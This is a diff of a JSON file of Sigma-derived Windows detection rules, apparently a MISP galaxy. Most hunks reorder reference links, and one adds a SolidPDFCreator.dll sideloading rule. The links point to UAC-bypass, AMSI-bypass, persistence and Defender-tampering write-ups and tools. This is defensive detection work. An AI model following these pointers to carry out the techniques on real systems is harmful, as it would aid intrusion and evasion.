@@ -19481,8 +19099,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml"
],
"tags": [
@@ -19548,8 +19166,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml"
],
"tags": [
@@ -19599,8 +19217,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
+ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml"
],
"tags": [
@@ -19791,9 +19409,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
"https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
],
"tags": [
@@ -19828,8 +19446,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
],
"tags": [
@@ -20117,10 +19735,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
],
"tags": [
@@ -20221,8 +19839,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
],
"tags": [
@@ -20257,8 +19875,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml"
],
"tags": [
@@ -20308,8 +19926,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://persistence-info.github.io/Data/hhctrl.html",
+ "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml"
],
"tags": [
@@ -20532,8 +20150,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://persistence-info.github.io/Data/naturallanguage6.html",
+ "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml"
],
"tags": [
@@ -20589,8 +20207,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -20627,8 +20245,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml"
],
"tags": [
@@ -20661,8 +20279,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
"https://persistence-info.github.io/Data/mpnotify.html",
+ "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml"
],
"tags": [
@@ -20687,8 +20305,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml"
],
"tags": [
@@ -20813,8 +20431,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml"
],
"tags": [
@@ -20959,8 +20577,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml"
],
"tags": [
@@ -20993,8 +20611,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute",
+ "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
"https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml"
],
@@ -21094,8 +20712,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
"https://www.sans.org/cyber-security-summit/archives",
+ "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
"https://twitter.com/jamieantisocial/status/1304520651248668673",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml"
],
@@ -21223,8 +20841,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
],
"tags": [
@@ -21290,8 +20908,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
+ "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml"
],
"tags": [
@@ -21381,8 +20999,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml"
],
"tags": [
@@ -21554,8 +21172,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/VakninHai/status/1517027824984547329",
- "https://twitter.com/pabraeken/status/998627081360695297",
"https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files",
+ "https://twitter.com/pabraeken/status/998627081360695297",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"
],
"tags": [
@@ -21621,8 +21239,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/autodialdll.html",
"https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/",
+ "https://persistence-info.github.io/Data/autodialdll.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml"
],
"tags": [
@@ -21679,8 +21297,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
"https://youtu.be/zSihR3lTf7g",
+ "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml"
],
"tags": [
@@ -21715,9 +21333,9 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml"
],
"tags": [
@@ -21784,8 +21402,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
"https://unit42.paloaltonetworks.com/ransomware-families/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
],
"tags": [
@@ -21858,8 +21476,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
"https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml"
],
"tags": [
@@ -21893,8 +21511,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml"
],
@@ -21961,9 +21579,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
- "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
"https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
+ "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
+ "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml"
],
"tags": [
@@ -21987,9 +21605,9 @@
"logsource.product": "windows",
"refs": [
"https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
- "https://github.com/elastic/detection-rules/issues/1371",
- "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
"https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
+ "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
+ "https://github.com/elastic/detection-rules/issues/1371",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
],
"tags": [
@@ -22063,10 +21681,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/",
"https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md",
- "https://twitter.com/nas_bench/status/1626648985824788480",
"https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks",
+ "https://twitter.com/nas_bench/status/1626648985824788480",
+ "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml"
],
"tags": [
@@ -22133,8 +21751,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
],
@@ -22158,17 +21776,17 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
],
"tags": [
@@ -22244,8 +21862,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml"
],
"tags": [
@@ -22312,8 +21930,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
"https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml"
],
@@ -22381,10 +21999,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
+ "https://persistence-info.github.io/Data/ifilters.html",
"https://twitter.com/0gtweet/status/1468548924600459267",
"https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://persistence-info.github.io/Data/ifilters.html",
+ "https://github.com/gtworek/PSBits/tree/master/IFilter",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
],
"tags": [
@@ -22465,8 +22083,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time",
"https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml"
],
"tags": [
@@ -22534,9 +22152,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
+ "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml"
],
"tags": [
@@ -22571,9 +22189,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://twitter.com/dez_/status/986614411711442944",
"https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
+ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
],
"tags": [
@@ -22650,9 +22268,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
- "https://twitter.com/HunterPlaybook/status/1301207718355759107",
"https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/",
+ "https://twitter.com/HunterPlaybook/status/1301207718355759107",
+ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml"
],
"tags": [
@@ -22732,9 +22350,9 @@
"logsource.product": "windows",
"refs": [
"https://github.com/bohops/WSMan-WinRM",
- "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
"https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
+ "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml"
],
"tags": [
@@ -22921,8 +22539,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/wdormann/status/1547583317410607110",
"https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC",
+ "https://twitter.com/wdormann/status/1547583317410607110",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"
],
"tags": [
@@ -23116,8 +22734,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_drawing_load.yml"
],
"tags": [
@@ -23173,6 +22791,48 @@
"uuid": "facd1549-e416-48e0-b8c4-41d7215eedc8",
"value": "Amsi.DLL Load By Uncommon Process"
},
+ {
+ "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"",
+ "meta": {
+ "author": "X__Junior (Nextron Systems)",
+ "creation_date": "2023/05/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "image_load_side_load_solidpdfcreator.yml",
+ "level": "medium",
+ "logsource.category": "image_load",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1574.001",
+ "attack.t1574.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a2edbce1-95c8-4291-8676-0d45146862b3",
+ "value": "Potential SolidPDFCreator.DLL Sideloading"
+ },
{
"description": "Detects WMI command line event consumers",
"meta": {
@@ -23262,12 +22922,12 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
- "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
"https://github.com/Wh04m1001/SysmonEoP",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
